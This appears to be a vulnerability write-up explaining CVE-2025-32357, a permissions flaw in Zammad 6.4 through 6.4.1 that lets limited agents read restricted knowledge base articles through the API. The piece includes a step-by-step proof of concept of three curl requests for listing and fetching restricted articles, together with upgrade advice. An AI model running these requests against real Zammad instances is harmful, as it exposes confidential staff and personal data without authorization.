CVE CyberSecurity Database News

CVE-2025-32357 - Exploiting Zammad Knowledge Base Permissions Leak (Simple Guide & Proof of Concept)

Poster -

---

Zammad is a popular open-source ticketing system used by businesses and communities around the world. It allows agents to collaborate, help customers, and provide internal knowledge management using a flexible permissions system.

But from version 6.4. through 6.4.1, a dangerous vulnerability (CVE-2025-32357) was discovered: authenticated users with certain knowledge base permissions could use the Zammad API to view restricted knowledge base articles—content they shouldn't be able to see.

This guide gives a plain-English explanation of the bug, shows how to test/exploit it, and points to references for further info.

What is CVE-2025-32357?

Bug summary:
A flaw in Zammad’s permissions validation allowed some logged-in support agents to access knowledge base items they weren't authorized to see, simply by calling the API. Essentially, if an agent had minimal permissions on the knowledge base, they could fetch all articles, including confidential or restricted content.

Affected versions:

Zammad 6.4., 6.4.1

- Fixed in 6.4.2 (Release notes)

Why is this bad?

Knowledge base articles often contain sensitive data:

Personal information

If an attacker with a regular agent account can see “staff-only” or other confidential articles, it opens the door for information leaks.

An account on Zammad with limited agent permissions (but with some knowledge base access)

- API access (e.g., a session cookie, API token, or your username/password)

Step 1: Authentication

You log in, grab your session cookie or use HTTP Basic authentication.

Example (using cURL and API token)

curl -X GET \
  -H "Authorization: Token token=YOUR_ZAMMAD_API_TOKEN" \
  https://zammad.example.com/api/v1/knowledge_bases

Step 2: Enumerate All Knowledge Base Articles

The vulnerable API endpoint didn’t correctly filter what you’re allowed to see.

List all knowledge base articles

curl -X GET \
  -H "Authorization: Token token=YOUR_ZAMMAD_API_TOKEN" \
  'https://zammad.example.com/api/v1/knowledge_bases/1/locale/en'

Replace 1 and en with the actual Knowledge Base ID and language.

You’ll get a JSON object listing all visible articles, including those outside your normal permissions!

Step 3: Fetch Restricted Article Content

Say you spot an article ID 42 from the response above.

Request its details

curl -X GET \
  -H "Authorization: Token token=YOUR_ZAMMAD_API_TOKEN" \
  'https://zammad.example.com/api/v1/knowledge_base/answers/42/locale/en';

If vulnerable, you’ll receive the full contents—even if you shouldn’t.

What should happen?

You should receive a 403 (Forbidden) or similar error for articles you aren't allowed to see.

Upgrade Zammad to at least 6.4.2 immediately:

See official release notes.

References & Credits

- Zammad Release Notes
- Zammad CVE-2025-32357 Advisory *(pending official NVD page)*
- Official Zammad GitHub

TL;DR

- CVE-2025-32357 lets any agent with knowledge base access see all knowledge base articles via API, even restricted ones.

Timeline

Published on: 04/05/2025 21:15:39 UTC
Last modified on: 04/15/2025 16:37:00 UTC